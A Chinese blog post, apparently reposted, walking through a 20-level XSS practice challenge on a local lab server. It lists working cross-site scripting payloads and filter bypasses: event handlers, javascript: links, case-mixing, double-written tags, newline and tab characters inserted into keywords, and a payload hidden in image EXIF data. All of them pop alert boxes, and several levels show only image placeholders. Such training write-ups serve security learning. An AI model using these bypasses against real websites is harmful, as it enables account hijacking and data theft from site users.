码迷,mamicode.com
首页 > 其他好文 > 详细

XSS挑战20关

时间:2020-05-25 22:32:39      阅读:125      评论:0      收藏:0      [点我收藏+]

标签:链接   挑战   处理   image   注意   转义   包括   关键词   没有   

第一关:

没有过滤,直接构造payload过关:

http://127.0.0.1/xssgame/level1.php?name=test%3Cscript%3Ealert%28111%29%3C/script%3E

技术图片

第二关:

输入之后观察页面源代码可以看到<>被转义

技术图片

Payload:?keyword=test"><script>alert(111)</script>

技术图片

第三关:

输入之后查看源代码发现输出位置都被转义:

技术图片

然后通过‘和//闭合,用‘ onclick=javascript:alert(1)//

技术图片

?

第四关

闭合方式不同:

"onclick=javascript:alert(1)//

技术图片

第五关:

使用onclick和script标签会被加上_过滤

技术图片

技术图片

使用a标签payload:"><a href="javascript:alert(‘a‘)">1</a >//

技术图片

?

第六关:

Herf也被加上了_转义

技术图片

可以大小写绕过"><a HRef="javascript:alert(‘a‘)">1</a >//

技术图片

?

第七关:

被过滤:

技术图片

双写绕过:

"><scriscriptpt>alert(111)</scscriptript>//

技术图片

第八关:

发现有两处输出位置,第二处输出在了 a 标签 href 属性中,此处构造 payload,需要考 虑在 a 标签内,并绕过敏感字符。因为关键字符被做了替换,包括 script\herf\src\on\等, 大小写也不行。

技术图片

这里尝试构造特殊的字符处理,就是在关键词中添加特殊的制表符,例如%0A,%09

注意是在url中,在浏览器中输入会进行编码

技术图片

?

第九关

这一关多了对链接是否加http://的检查

Payload:javasc%0aript:alert(1)//http://aaa.com

技术图片

?

第十关:

有隐藏的表单

技术图片

技术图片

也可以通过抓包修改页面源代码

?

第十一关:

方法相同

技术图片

技术图片

?

第十二关:

?

技术图片

技术图片

?

第十三关:

技术图片

技术图片

?

第十四关:
利用exiftool改变图片的exif信息

上传一个含有xss代码的图片触发xss

在读取的时候就会导致 XSS

?

第十五关:

level15.php?src=‘level1.php‘level1.php?name=test<img src=1 onerror=alert(1)>‘

技术图片

技术图片

?

第十六关:

?keyword=test<img%0Dsrc="1"%0Donerror=alert(1)>

?

技术图片
第十七关:

?

技术图片

?

第十八关:

技术图片

?

第十九关:

技术图片

?

第二十关:
技术图片

XSS挑战20关

标签:链接   挑战   处理   image   注意   转义   包括   关键词   没有   

原文地址:https://www.cnblogs.com/hzk001/p/12961136.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!